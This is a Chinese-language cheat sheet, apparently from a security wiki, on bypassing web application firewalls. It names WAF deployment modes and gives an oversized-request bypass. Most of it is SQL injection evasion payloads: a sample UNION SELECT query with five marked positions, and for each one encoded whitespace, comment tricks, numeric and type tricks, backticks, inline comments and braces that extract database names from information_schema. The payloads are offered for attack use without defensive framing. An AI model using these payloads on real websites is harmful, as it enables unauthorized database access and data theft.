Comment on page
Bypass Waf
- DNS解析
- 旁路
- 串联
- 反向代理模式
- 透明代理模式
- 软件嵌入中间件 + 检测引擎模式
超长数据包BYPASS
GET型请求转POST型 Content-Length 头长度大于4008 正常参数放置在脏数据后面,否则无效
select id,contents,time from news where news_id=1①union②select③1,2,db_name()④from⑤admin**
位置①
可利用其他控制字符替换空格:%09,%0a,%0b,%0c,%0d,%20,%a0
可利用注释符号:/**/、#test%0d%0a、 --+a
可利用数学运算以及数据类型:**news_id=1.1,**news_id=1E0,news_id=\N
位置②
可利用其他控制字符替换空格:%09,%0a,%0b,%0c,%0d,%20,%a0。
可利用注释符号:/**/、 #test%0d%0a、 --+a
可利用括号:union(select 1,2)
位置③
可利用其他控制字符替换空格:%09,%0a,%0b,%0c,%0d,%20,%a0
可利用注释符号:/**/、 #test%0d%0a、 --+a
可利用其他符号:+ 、- 、 ~ 、!、@
位置④
可利用其他控制字符替换空格: %09,%0a,%0b,%0c,%0d,%20,%a0
可利用注释符号: /**/、#test%0d%0a、 --+a
可利用数学运算以及数据类型:
union select user(),2.0from admin
union select user(),8e0from admin
union select user(),\Nfrom admin
位置⑤
可利用其他控制字符替换空格: %09,%0a,%0b,%0c,%0d,%20,%a0
可利用注释符号: /**/、#test%0d%0a、--+a
`号:union select 1 schema_name from`information_schema`.SCHEMATA limit 0,1)
内联注释:**union select 1,(select(schema_name)from/*!12345information_schema.SCHEMATA*/ limit 0,1)
{号: **union select 1,(select(schema_name)from {x information_schema.SCHEMATA} limit 0,1)
(号:**union select 1,(select(schema_name)from(information_schema.SCHEMATA) limit 0,1)